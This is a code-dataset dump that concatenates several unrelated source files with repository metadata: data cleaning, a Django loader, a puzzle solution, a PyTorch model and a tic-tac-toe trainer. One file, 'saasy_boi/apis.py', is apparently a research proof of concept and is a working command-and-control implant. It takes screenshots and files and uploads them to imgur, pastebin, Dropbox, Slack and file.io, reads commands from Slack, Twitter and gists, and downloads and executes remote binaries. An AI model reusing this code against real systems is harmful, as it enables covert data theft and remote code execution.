] | 2 | 2021-07-12T21:48:09.000Z | 2021-08-15T00:19:27.000Z | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
def LoadnClean (path):
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
df = (
pd.read_csv(path,index_col = 0)
)
df1 = ( df
.replace("",float("NaN"))
.dropna()
.reset_index(drop=True)
)
df2 = ( df1
.drop(index=df1.index[0])
.rename(columns={"X1":"Credit Limit",
"X2":"Sex",
"X3":"Education",
"X4":"Marital Status",
"X5":"Age",
"X6":"Pay/Sept07",
"X6":"PayStat/Sept05",
"X7":"PayStat/Aug05",
"X8":"PayStat/Jul05",
"X9":"PayStat/Jun05",
"X10":"PayStat/May05",
"X11":"PayStat/Apr05",
"X12":"Outstanding/Sept05",
"X13":"Outstanding/Aug05",
"X14":"Outstanding/Jul05",
"X15":"Outstanding/Jun05",
"X16":"Outstanding/May05",
"X17":"Outstanding/Apr05",
"X18":"Paid/Sept05",
"X19":"Paid/Aug05",
"X20":"Paid/Jul05",
"X21":"Paid/Jun05",
"X22":"Paid/May05",
"X23":"Paid/Apr05",
"Y":"Default"
})
.apply(pd.to_numeric)
.replace({'Sex': {1: "M", 2: 'F'}})
.replace({'Education': {1: "MSc or PHd", 2: 'BSc', 3: 'High School Diploma', 4:"Other", 5:"Delete", 6:"Delete", 0:"Delete"}})
.replace({'Marital Status': {1: "Married", 2: 'Single', 3: 'Other', 0:"Delete"}})
.replace({'Default': {1: "True", 0: 'False'}})
.loc[lambda row : ~row['Education'].str.contains('Delete')]
.loc[lambda row : ~row['Marital Status'].str.contains('Delete')]
)
df2
df3 = ( df2
.assign(Payment_Score=(df2["PayStat/Sept05"]+df2['PayStat/Aug05']+df2['PayStat/Jul05']+df2['PayStat/Jun05']+df2['PayStat/May05']+df2['PayStat/Apr05']+6)/6)
.assign(Avg_Outstanding=(df2["Outstanding/Sept05"]+df2['Outstanding/Aug05']+df2['Outstanding/Jul05']+df2['Outstanding/Jun05']+df2['Outstanding/May05']+df2['Outstanding/Apr05'])/6)
.assign(Avg_Paid=(df2["Paid/Sept05"]+df2['Paid/Aug05']+df2['Paid/Jul05']+df2['Paid/Jun05']+df2['Paid/May05']+df2['Paid/Apr05'])/6)
.drop(["PayStat/Jun05","PayStat/Sept05","PayStat/Aug05","PayStat/Jul05","PayStat/May05","PayStat/Apr05"], axis=1)
.drop(["Outstanding/Sept05","Outstanding/Aug05","Outstanding/Apr05","Outstanding/Jul05","Outstanding/Jun05","Outstanding/May05"], axis=1)
.drop(["Paid/Sept05","Paid/Aug05","Paid/Apr05","Paid/Jul05","Paid/Jun05","Paid/May05"], axis=1)
.reindex(columns=["Credit Limit", "Sex", "Education","Marital Status","Age","Payment_Score","Avg_Outstanding","Avg_Paid","Default"])
)
df3
return df3
def AgevsDefault (df):
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
x,y = 'Age', 'Default'
(df
.groupby(x)[y]
.value_counts(normalize=True)
.mul(100)
.rename('percent')
.reset_index()
.pipe((sns.catplot,'data'), x=x,y='percent',height=5,aspect=3,hue=y,kind='bar'))
def JustPayments(path):
import pandas as pd
import seaborn as sns
import matplotlib as plt
import numpy as np
df1 = (
pd.read_csv(path,index_col = 0)
)
df2 = ( df1
.drop(index=df1.index[0])
.rename(columns={"X1":"Credit Limit",
"X2":"Sex",
"X3":"Education",
"X4":"Marital Status",
"X5":"Age",
"X6":"Pay/Sept07",
"X6":"PaySep",
"X7":"PayAug",
"X8":"PayJul",
"X9":"PayJun",
"X10":"PayMay",
"X11":"PayApr",
"X12":"Outstanding/Sept05",
"X13":"Outstanding/Aug05",
"X14":"Outstanding/Jul05",
"X15":"Outstanding/Jun05",
"X16":"Outstanding/May05",
"X17":"Outstanding/Apr05",
"X18":"Paid/Sept05",
"X19":"Paid/Aug05",
"X20":"Paid/Jul05",
"X21":"Paid/Jun05",
"X22":"Paid/May05",
"X23":"Paid/Apr05",
"Y":"Default"
})
.apply(pd.to_numeric) )
df2
df3 = ( df2
.assign(Payment_Score=(df2["PaySep"]+df2['PayAug']+df2['PayJul']+df2['PayJun']+df2['PayMay']+df2['PayApr']+6)/6)
.assign(Avg_Outstanding=(df2["Outstanding/Sept05"]+df2['Outstanding/Aug05']+df2['Outstanding/Jul05']+df2['Outstanding/Jun05']+df2['Outstanding/May05']+df2['Outstanding/Apr05'])/6)
.assign(Avg_Paid=(df2["Paid/Sept05"]+df2['Paid/Aug05']+df2['Paid/Jul05']+df2['Paid/Jun05']+df2['Paid/May05']+df2['Paid/Apr05'])/6)
.drop(["Sex","Marital Status","Education"], axis=1)
)
df3["PaySep"]=df3["PaySep"]+1
df3["PayAug"]=df3["PayAug"]+1
df3["PayJul"]=df3["PayJul"]+1
df3["PayJun"]=df3["PayJun"]+1
df3["PayMay"]=df3["PayMay"]+1
df3["PayApr"]=df3["PayApr"]+1
df3
return df3
def Defaulters(df):
df4 = (df.loc[lambda x: x['Default']==1]
)
return df4
| 43.129252 | 195 | 0.435016 | 600 | 6,340 | 4.566667 | 0.24 | 0.061314 | 0.014599 | 0.017518 | 0.516058 | 0.516058 | 0.508759 | 0.470803 | 0.470803 | 0.470803 | 0 | 0.090767 | 0.395268 | 6,340 | 146 | 196 | 43.424658 | 0.623892 | 0.006467 | 0 | 0.530769 | 0 | 0 | 0.278272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0 | 0.092308 | 0 | 0.146154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec13621ede7ad08cdf4a9c2edd5a1f939fb4fac | 1,820 | py | Python | AI_Web/GA/tools/pre_load_data.py | xwy27/ArtificialIntelligenceProjects | e2b0154f07d749084e2d670260fa82f8f5ea23ed | [
"MIT"
] | 4 | 2018-12-19T14:10:56.000Z | 2021-07-12T06:05:17.000Z | AI_Web/GA/tools/pre_load_data.py | xwy27/ArtificialIntelligenceProjects | e2b0154f07d749084e2d670260fa82f8f5ea23ed | [
"MIT"
] | 1 | 2019-08-06T01:57:41.000Z | 2019-08-06T01:57:41.000Z | AI_Web/SA/tools/pre_load_data.py | xwy27/ArtificialIntelligenceProjects | e2b0154f07d749084e2d670260fa82f8f5ea23ed | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''pre load default TSP city data into database'''
from django.db.transaction import atomic
from ..models import *
import os
@atomic
def atomic_save(items):
for item in items:
item.save()
# Load default city data
def load_cities(cities_folder_path, delete=False):
'''
Load data files in cities_folder_path to database
if delete is True, previous data in database will be deleted
'''
if delete:
print('\nDeleting all previous city data...')
City.objects.all().delete()
print('Deletion completes\n')
print('Adding city data...\n')
cities = []
print('Loading %s ...' % cities_folder_path)
for root, dirs, files in os.walk(cities_folder_path):
for name in files:
filePath = os.path.join(root, name)
print('Loading %s ...' % filePath)
flag = False
try:
with open(filePath, mode='rb') as f:
for line in f:
# Check dimension info
if line.find(b'EDGE_WEIGHT_TYPE\n') != -1:
if line.split(':')[-1].find(b'EUC_2D') == -1:
raise Exception('Only two-dimension supported.')
# Start process node
if line.find(b'NODE_COORD_SECTION') != -1:
flag = True
continue
if line.find(b'EOF') != -1:
break
if flag:
s = str(line, encoding='utf-8')
temp = s.split(' ')
cities.append(City(
id = temp[0],
X = temp[1],
Y = temp[2]
))
except Exception as result:
print('Err:%s' % result)
print('\nSaving city data...')
atomic_save(cities)
print('Save complates')
def pre_load_data(currentPath):
load_cities(os.path.join(currentPath, 'Cities'), True)
| 26.764706 | 64 | 0.562088 | 233 | 1,820 | 4.309013 | 0.446352 | 0.039841 | 0.063745 | 0.032869 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008744 | 0.308791 | 1,820 | 67 | 65 | 27.164179 | 0.789348 | 0.132418 | 0 | 0 | 0 | 0 | 0.150931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.065217 | 0 | 0.130435 | 0.173913 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec186c4e3adffdeaef95f08452042f97de330e2 | 11,725 | py | Python | saasy_boi/apis.py | NetskopeOSS/sassy_boi | dbbfd9223a8a93e495ea39c0e8ea54be5fb47715 | [
"BSD-3-Clause"
] | 6 | 2019-10-09T03:51:34.000Z | 2022-01-08T19:59:07.000Z | saasy_boi/apis.py | NetskopeOSS/sassy_boi | dbbfd9223a8a93e495ea39c0e8ea54be5fb47715 | [
"BSD-3-Clause"
] | null | null | null | saasy_boi/apis.py | NetskopeOSS/sassy_boi | dbbfd9223a8a93e495ea39c0e8ea54be5fb47715 | [
"BSD-3-Clause"
] | 1 | 2021-08-05T07:25:06.000Z | 2021-08-05T07:25:06.000Z | # Copyright 2019 Netskope, Inc.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Written by Erick Galinkin
#
# This code is a proof of concept intended for research purposes only. It does not contain any payloads. It is not
# weaponized.
import requests
import utils
import time
import tempfile
import shutil
import base64
import os
import tweepy
from tweepy.api import API
import json
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " \
"Chrome/74.0.3729.169 Safari/537.36"
def imgur_capture_screen(creds, sleep=0, admin=False):
"""
Captures the screen after (optionally) sleeping for some number of seconds and uploads it to imgur.
If admin is set to true (that is, if you're admin!)
Returns the imgur link.
"""
time.sleep(sleep)
if admin:
tempdir = tempfile.mkdtemp()
fname = utils.screenshot(tempdir, "screencap.png")
else:
fname = utils.screenshot("./", "screencap.png")
link = imgur_upload_image(fname, creds)
if admin:
shutil.rmtree(tempdir)
else:
os.remove(fname)
return link
def imgur_upload_image(image_path, creds):
url = "https://api.imgur.com/3/image"
headers = {
'user-agent': user_agent,
'authorization': 'Client-ID {}'.format(creds)
}
try:
r = requests.post(
url,
headers=headers,
data={
'image': base64.b64encode(open(image_path, 'rb').read()),
'title': image_path
}
)
data = r.json()
return data['data']['link']
except Exception:
return "Upload failed"
def get_keys():
# TODO: Have a better way to get keys - maybe CLI arguments
# Could probably hard code the urls, but this makes it so we can just not commit the urls to the repo.
# urls.txt one URL per line.
# urls.txt should look like:
# Slack <url to get slack token>
# Slack <url to get slack token>
# Twitter <url to get twitter keys>
# Twiter <url to get twitter keys>
# Or however many tokens you have.
f = open("urls.txt")
urls = [line.strip().split(" ") for line in f]
f.close()
# Cover your tracks a little bit buddy
# os.remove("urls.txt")
headers = {
'user-agent': user_agent
}
for url in urls:
try:
method = url[0]
r = requests.get(
url[1],
headers=headers
)
key = r.text.strip()
if method == "Twitter":
key = tuple(key.split(";"))
return method, key
except Exception:
pass
return None, None
def pastebin_paste_file_contents(devkey, filepath):
url = "https://pastebin.com/api/api_post.php"
headers = {
'user-agent': user_agent
}
with open(filepath, "r") as f:
contents = f.read()
args = {
"api_dev_key": devkey,
"api_option": "paste",
"api_paste_code": contents
}
r = requests.post(
url,
headers=headers,
data=args
)
link = r.text
return link
def github_get_commands(gist_location):
headers = {
'user-agent': user_agent
}
r = requests.get(
gist_location,
headers
)
command = r.text
return command
def dropbox_download_exec(creds, filepath):
url = "https://content.dropboxapi.com/2/files/download"
headers = {
"Authorization": "Bearer {}".format(creds),
"Dropbox-API-Arg": "{\"path\":\"" + filepath + "\"}"
}
r = requests.post(url, headers=headers)
with open("asdf", "wb") as f:
f.write(r.text.encode())
os.system("chmod 777 asdf")
os.system("./asdf")
os.remove("asdf")
def dropbox_upload(creds, cname, filepath):
if not dropbox_folder_check(creds, cname):
return None
url = "https://content.dropboxapi.com/2/files/upload"
fname = os.path.basename(filepath)
headers = {
'user-agent': user_agent,
'Content-type': "application/octet-stream",
'Authorization': "Bearer {}".format(creds),
"Dropbox-API-Arg": "{\"path\":\"/" + cname.lower() + "/" + fname.lower() + "\",\"autorename\":true}"
}
data = open(filepath, "rb").read()
r = requests.post(
url,
headers=headers,
data=data
)
return r.status_code == 200
def dropbox_folder_check(creds, folder_name):
url = "https://api.dropboxapi.com/2/files/list_folder"
headers = {
'user-agent': user_agent,
'Content-type': "application/json",
'Authorization': "Bearer {}".format(creds),
}
content = {
"path": "/{}".format(folder_name.lower())
}
r = requests.post(
url,
headers=headers,
data=json.dumps(content)
)
if r.status_code != 200:
url = "https://api.dropboxapi.com/2/files/create_folder_v2"
r = requests.post(
url,
headers=headers,
data=json.dumps(content)
)
if r.status_code != 200:
return False
return True
def slack_checkin(creds, sysinfo):
url = "https://slack.com/api/conversations.list?token={}".format(creds)
headers = {
'user-agent': user_agent,
'Content-type': "application/json"
}
r = requests.get(
url,
headers=headers
)
data = r.json()
for channel in data['channels']:
if channel['name'] == 'general':
channel_id = channel['id']
resp = slack_post_to_channel(channel_id, creds, sysinfo)
if resp is not None:
pin = slack_get_pins(channel_id, creds)
return pin
return None
def slack_upload_file(channel, creds, file):
url = "https://slack.com/api/files.upload"
headers = {
'user-agent': user_agent,
'Authorization': "Bearer {}".format(creds)
}
content = {
'file': (file, open(file, 'rb')),
'initial_comment': file,
'channels': channel,
}
r = requests.post(
url,
headers=headers,
files=content
)
data = r.json()
link = data['file']['url_private_download']
return link
def slack_create_channel(channel_name, creds):
url = "https://slack.com/api/channels.create?token={}&name={}".format(creds, channel_name)
headers = {
'user-agent': user_agent,
'Content-type': "application/json",
}
r = requests.post(
url,
headers=headers
)
data = r.json()
if data["ok"]:
return data["channel"]["id"]
def slack_get_commands(channel, creds):
# We could proably listen and use the Events API but that sounds a lot like hosting an HTTP server on localhost
url = "https://slack.com/api/conversations.history?token={}&channel={}&limit=1".format(creds, channel)
headers = {
'user-agent': user_agent,
'Content-type': "application/x-www-form-urlencoded"
}
r = requests.get(
url,
headers=headers
)
data = r.json()
if data["ok"]:
if "subtype" in data['messages'][-1].keys():
if data['messages'][-1]['subtype'] == "bot_message":
return None
cmd = data["messages"][-1]["text"]
cmd = cmd.split("\n")
return cmd
else:
return None
def slack_get_pins(channel, creds):
url = "https://slack.com/api/pins.list?token={}&channel={}".format(creds, channel)
headers = {
'user-agent': user_agent
}
r = requests.get(
url,
headers=headers
)
data = r.json()
if data['ok']:
pin_cmd = data['items'][0]['message']['text']
pin_cmd = pin_cmd.split("\n")
return pin_cmd
def slack_post_to_channel(channel, creds, message):
url = "https://slack.com/api/chat.postMessage"
headers = {
'user-agent': user_agent,
'Content-type': "application/json",
'Authorization': "Bearer {}".format(creds)
}
content = {
"channel": channel,
"text": message
}
r = requests.post(
url,
headers=headers,
json=content
)
data = r.json()
if data["ok"]:
return channel
else:
return None
# TODO: handle the API objects better so we don't get rate limited all the time
def twitter_checkin(creds, sysinfo):
consumer_key, consumer_secret, access_token, access_token_secret = creds
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = API(auth, wait_on_rate_limit=True)
api.update_status(sysinfo)
return ["twitter_checkin"]
def twitter_get_commands(creds):
consumer_key, consumer_secret, access_token, access_token_secret = creds
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = API(auth, wait_on_rate_limit=True)
dms = api.list_direct_messages(3)
for dm in dms:
if "source_app_id" not in dm.message_create.keys():
command = dm.message_create['message_data']['text']
return command
return None
def twitter_post_response(creds, message, user):
consumer_key, consumer_secret, access_token, access_token_secret = creds
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = API(auth, wait_on_rate_limit=True)
api.send_direct_message(user, message)
return True
def fileio_upload(filepath):
files = {
'file': (filepath, open(filepath, 'rb')),
}
headers = {
'user-agent': user_agent
}
r = requests.post(
'https://file.io/',
files=files,
headers=headers
)
data = r.json()
return data['link']
def fileio_download_exec(filekey):
url = "https://file.io/{}".format(filekey)
headers = {
'user-agent': user_agent
}
r = requests.get(
url,
headers=headers
)
with open("asdf", "wb") as f:
f.write(r.text.encode())
os.system("chmod 777 asdf")
os.system("./asdf")
os.remove("asdf")
| 27.916667 | 120 | 0.615778 | 1,469 | 11,725 | 4.81484 | 0.252553 | 0.036901 | 0.03167 | 0.039587 | 0.379188 | 0.336774 | 0.293369 | 0.251378 | 0.214478 | 0.20557 | 0 | 0.008366 | 0.266013 | 11,725 | 419 | 121 | 27.983294 | 0.813502 | 0.206482 | 0 | 0.454545 | 0 | 0.003247 | 0.1823 | 0.006167 | 0 | 0 | 0 | 0.002387 | 0 | 1 | 0.061688 | false | 0.003247 | 0.032468 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec330c45c5450e56db86bcc225b4e9c85a36af2 | 941 | py | Python | codeforces/B/8-451B.py | safiulanik/problem-solving | 116539750b901b55fe6e69447c8ede78f2e9ff16 | [
"MIT"
] | null | null | null | codeforces/B/8-451B.py | safiulanik/problem-solving | 116539750b901b55fe6e69447c8ede78f2e9ff16 | [
"MIT"
] | null | null | null | codeforces/B/8-451B.py | safiulanik/problem-solving | 116539750b901b55fe6e69447c8ede78f2e9ff16 | [
"MIT"
] | null | null | null | """
URL: https://codeforces.com/problemset/problem/451/B
Author: Safiul Kabir [safiulanik at gmail.com]
Tags: implementation, sortings, *1300
"""
def main():
n = int(input())
ll = list(map(int, input().split()))
start, end = -1, -1
for i in range(n - 1):
if ll[i] > ll[i + 1]:
start = i + 1
break
if start == -1:
print('yes')
print('1 1')
return
for i in range(start, n - 1):
if ll[i] < ll[i + 1]:
end = i + 1
break
if start > -1 and end == -1:
end = n
for i in range(start - 1):
if ll[i] > ll[end - 1]:
print('no')
break
else:
for i in range(end, n):
if ll[i] < ll[start - 1] or (i < n - 1 and ll[i] > ll[i + 1]):
print('no')
break
else:
print('yes')
print(f'{start} {end}')
main()
| 20.021277 | 74 | 0.430393 | 133 | 941 | 3.045113 | 0.330827 | 0.059259 | 0.061728 | 0.108642 | 0.325926 | 0.128395 | 0.054321 | 0.054321 | 0 | 0 | 0 | 0.045126 | 0.411265 | 941 | 46 | 75 | 20.456522 | 0.685921 | 0.14559 | 0 | 0.322581 | 0 | 0 | 0.032663 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0 | 0 | 0.064516 | 0.193548 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec5c30f23ba531d5364376457bcfc23d7f65b85 | 2,877 | py | Python | finetune-data-sampling/pytorch_softmax_regression_4_class.py | lankuohsing/machine-learning-in-python | a7317325dd914402231ee908e4208e1ddb171a28 | [
"MIT"
] | null | null | null | finetune-data-sampling/pytorch_softmax_regression_4_class.py | lankuohsing/machine-learning-in-python | a7317325dd914402231ee908e4208e1ddb171a28 | [
"MIT"
] | null | null | null | finetune-data-sampling/pytorch_softmax_regression_4_class.py | lankuohsing/machine-learning-in-python | a7317325dd914402231ee908e4208e1ddb171a28 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 7 22:03:24 2021
@author: lankuohsing
"""
import numpy as np
import torch.utils.data as Data
import torch
from collections import OrderedDict
from torchsummary import summary
# In[]
data1=[]
labels1=[]
data2=[]
labels2=[]
with open("./dataset/4_class_data_2d.txt",'r',encoding="UTF-8") as rf:
for line in rf:
split_list=line.strip().split(" ")
x=float(split_list[0])
y=float(split_list[1])
label=int(split_list[2])
if (x-2)**2+(y-2)**2<=0.5**2:
data2.append([x,y])
labels2.append([label-1])
else:
data1.append([x,y])
labels1.append([label-1])
# In[]
class_num=4
features=torch.tensor(data1,dtype=torch.float)
labels=torch.tensor(labels1,dtype=torch.long)
one_hot_labels=torch.zeros(len(labels),class_num).scatter_(1,labels,1)
batch_size=64
# 将训练数据的特征和标签组合
dataset=Data.TensorDataset(features,one_hot_labels)
# 随机读取小批量
train_loader=Data.DataLoader(dataset,batch_size,shuffle=True)
test_loader=train_loader
epochs=100
# In[]
num_inputs=2
num_outputs=4
class LinearNet(torch.nn.Module):
def __init__(self,num_inputs,num_outputs):
super(LinearNet,self).__init__()
self.linear=torch.nn.Linear(num_inputs,num_outputs)
def forward(self,x): # x.shape: (batch,num_input)
y=self.linear(x.view(x.shape[0],-1))
return y
softmax_regression=torch.nn.Sequential(
OrderedDict([
("linear",torch.nn.Linear(num_inputs,num_outputs))
])
)
torch.nn.init.normal_(softmax_regression.linear.weight,mean=0,std=0.01)
torch.nn.init.constant_(softmax_regression.linear.weight,val=0.01)
criterion=torch.nn.CrossEntropyLoss()
optimizer=torch.optim.SGD(softmax_regression.parameters(),lr=0.01)
for epoch in range(epochs):
for batch_idx,(feature_in_on_batch,label_in_one_batch) in enumerate(train_loader):
logits=softmax_regression(feature_in_on_batch)
loss=criterion(logits,label_in_one_batch)
break
optimizer.zero_grad()
loss.backward()
optimizer.step()
# if batch_idx % 100==0:
# print("Train Epoch: {} [{}/{}({:0f}%)]\tLoss: {:6f}".format(epoch,batch_idx*len(feature_in_on_batch),len(train_loader.dataset),100.*batch_idx/len(train_loader),loss.item()))
test_loss=0
correct=0
for data,target in test_loader:
logits=softmax_regression(data)
test_loss+=criterion(logits,target).item()
pred=logits.data.max(1)[1]
correct+=pred.eq(torch.nonzero(target.data)[:,1]).sum()
test_loss/=len(test_loader.dataset)
print("\nTest set: Average loss: {:.4f}, Accuracy: {}/{}({:.3f}%)".
format(test_loss,correct,
len(test_loader.dataset),
100.*correct/len(test_loader.dataset)))
# In[]
summary(softmax_regression,(1,2)) | 33.453488 | 186 | 0.668752 | 410 | 2,877 | 4.507317 | 0.356098 | 0.026515 | 0.019481 | 0.030844 | 0.070346 | 0.041126 | 0.041126 | 0.041126 | 0 | 0 | 0 | 0.033784 | 0.17692 | 2,877 | 86 | 187 | 33.453488 | 0.746622 | 0.126521 | 0 | 0 | 0 | 0 | 0.040048 | 0.011614 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028986 | false | 0 | 0.072464 | 0 | 0.130435 | 0.014493 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec8117705a6e00290140c42310bd866602c4857 | 6,543 | py | Python | Training.py | Waewarin-C/MLProject | 9bd3821db24b1210621169cbbfdd68a1d6e6ab20 | [
"CC-BY-4.0"
] | null | null | null | Training.py | Waewarin-C/MLProject | 9bd3821db24b1210621169cbbfdd68a1d6e6ab20 | [
"CC-BY-4.0"
] | null | null | null | Training.py | Waewarin-C/MLProject | 9bd3821db24b1210621169cbbfdd68a1d6e6ab20 | [
"CC-BY-4.0"
] | null | null | null | from TabularTrainer import *
from RandomPlayer import *
from TicTacToe import *
import matplotlib.pyplot as plt
action_to_coordinate = {0: (0, 0), 1: (0, 1), 2: (0, 2),
3: (1, 0), 4: (1, 1), 5: (1, 2),
6: (2, 0), 7: (2, 1), 8: (2, 2)}
NUM_OF_BATTLES = 10
NUM_OF_GAMES = 50
#NOTE: tried to keep anything updating the board in this tile so we could use the TicTacToe functions
class Training:
def begin_training(self, number_of_battles = NUM_OF_BATTLES):
print("training started")
# Have own while loop to play game
agent1_wins = []
agent2_wins = []
draws = []
count = []
counter = 0
for i in range(0, number_of_battles):
print("battle " + str(i))
agent1Win, agent2Win, draw = self.battleRounds()
# Need to figure out the math depending on the number of games
# we want it to show like in the example code (I might not have explained that clearly oops)
agent1_wins.append((agent1Win / (agent1Win + agent2Win + draw)) * 100)
agent2_wins.append((agent2Win / (agent1Win + agent2Win + draw)) * 100)
draws.append((draw / (agent1Win + agent2Win + draw)) * 100)
counter = counter + 1
count.append(counter * NUM_OF_GAMES)
self.visualize_training_results(count, agent1_wins, agent2_wins, draws)
print("training ended")
def battleRounds(self, number_of_games = NUM_OF_GAMES):
agent1 = TabularTrainer('O', 'Agent 1')
#agent2 = TabularTrainer('X', 'Agent 2')
agent2 = RandomPlayer('X', 'Agent 2')
agent1WinCount = 0
agent2WinCount = 0
drawCount = 0
for i in range(0, number_of_games):
print("game " + str(i))
winner = self.playGame(agent1, agent2, number_of_games)
if winner == 1:
if isinstance(agent1, TabularTrainer):
agent1.save_to_file()
agent1.historic_data.clear()
agent1WinCount += 1
elif winner == 2:
if isinstance(agent2, TabularTrainer):
agent2.save_to_file()
agent2.historic_data.clear()
agent2WinCount += 1
else:
drawCount += 1
return agent1WinCount, agent2WinCount, drawCount
def playGame(self, agent1, agent2, number_of_games) -> int:
game = TicTacToe(agent1, agent2)
finished = False
while not finished:
finished = self.evaluateMove(agent1, game)
if finished:
break
else:
finished = self.evaluateMove(agent2, game)
if finished:
break
game.determine_winner()
winner = self.get_game_results(game, agent1, agent2)
return winner
def evaluateMove(self, agent, game):
move = agent.move(game.game_board)
if move == -1:
return True
coord = action_to_coordinate[move]
game.play_round(coord)
game.game_board.setSpaceTaken(coord)
finished = self.game_is_finished(game.get_board_grid())
return finished
def game_is_finished(self, board):
game_over = False
if np.all((board == 0)):
game_over = True
if (board[0, 0] > 0) and (board[0, 0] == board[0, 1] == board[0, 2]):
game_over = True
if (board[1, 0] > 0) and (board[1, 0] == board[1, 1] == board[1, 2]):
game_over = True
if (board[2, 0] > 0) and (board[2, 0] == board[2, 1] == board[2, 2]):
game_over = True
if (board[0, 0] > 0) and (board[0, 0] == board[1, 1] == board[2, 2]):
game_over = True
if (board[0, 2] > 0) and (board[0, 2] == board[1, 1] == board[2, 0]):
game_over = True
if (board[0, 0] > 0) and (board[0, 0] == board[1, 0] == board[2, 0]):
game_over = True
if (board[0, 1] > 0) and (board[0, 1] == board[1, 1] == board[2, 1]):
game_over = True
if (board[0, 2] > 0) and (board[0, 2] == board[1, 2] == board[2, 2]):
game_over = True
return game_over
def get_game_results(self, game, agent1, agent2) -> int:
winner = 0
if game.game_won:
if game.winning_player == game.player_one:
if isinstance(agent1, TabularTrainer):
agent1.result("won")
if isinstance(agent2, TabularTrainer):
agent2.result("loss")
winner = 1
else:
if isinstance(agent1, TabularTrainer):
agent1.result("loss")
if isinstance(agent2, TabularTrainer):
agent2.result("won")
winner = 2
elif game.tie_game:
if isinstance(agent1, TabularTrainer):
agent1.result("tie")
if isinstance(agent2, TabularTrainer):
agent2.result("tie")
#Tabular Trainer against itself
if isinstance(agent2, TabularTrainer) and isinstance(agent1, TabularTrainer):
higher_q_values = self.see_who_has_higher_qvalues(agent1.final_q_values, agent2.final_q_values)
#Tabular Trainer against RandomPlayer
if isinstance(agent2, RandomPlayer):
higher_q_values = agent1.final_q_values
if isinstance(agent1, RandomPlayer):
higher_q_values = agent2.final_q_values
return winner
def see_who_has_higher_qvalues(self, agent1_q_values, agent2_q_values):
agent1 = 0.0
agent2 = 0.0
for i in range(0, len(agent1_q_values)):
agent1 += agent1_q_values[i]
agent2 += agent2_q_values[i]
if agent1 > agent2:
return agent1_q_values
elif agent1 < agent2:
return agent2_q_values
# Default would be if the q values are equal
return agent1_q_values
#Plot the number of games each agent wins and ties
def visualize_training_results(self, gameNum, agent1_wins, agent2_wins, draws):
plt.plot(gameNum, agent1_wins)
plt.plot(gameNum, agent2_wins)
plt.plot(gameNum, draws)
plt.title('Battle Round Metrics')
plt.legend(['Agent 1 Wins', 'Agent 2 Wins', 'Draws'])
